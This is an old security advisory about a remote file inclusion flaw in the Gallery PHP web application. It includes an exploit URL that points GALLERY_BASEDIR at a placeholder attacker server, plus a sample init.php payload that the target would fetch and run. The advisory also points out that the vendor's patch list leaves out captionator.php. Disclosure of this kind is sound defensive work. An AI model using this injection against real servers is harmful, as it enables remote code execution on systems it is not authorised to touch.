code injection in gallery

Type securityvulns
Reporter Securityvulns
Modified 2002-08-03T00:00:00



Code injection in gallery

What is gallery?

The Gallery is actually the best web gallery application around in the world. I'm using it too ;-). Go to <> to get further information and download this very cool app.

remote include problems

Problem description

There are several include statements that includes a variable without checking it. A administrator of PowerTech (an ISP in Norway) discovered this problems.

You're able to inject foreign code into the application (if allow_url_fopen is turned on).

Example code: errors/configmode.php [...] <? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?> [...]

How can I exploit the code?

Use this line: http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/

On http://your.evil.server.tdl/ you place a file called init.php that puts out nasty php-code. The file could look like this: init.php: <?php echo "<?php phpinfo(); ?>"; ?>

And the solution?

Go to <> to see how to solve the problem.

Why do you post this problem again?

Because the author of the announcement on the gallery website said: An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relativ ely easy to do. All you need to do is edit these files: errors/configmode.php errors/needinit.php errors/reconfigure.php errors/unconfigured.php

That's not absolutely have to patch the file: captionator.php too!

Hope it's fixed in new releases :). PS: Their website is now updated.


For the german-speaking folk: <> Noncredit: florg, thank you for turning off the whole website! :/

-- GMX - Die Kommunikationsplattform im Internet.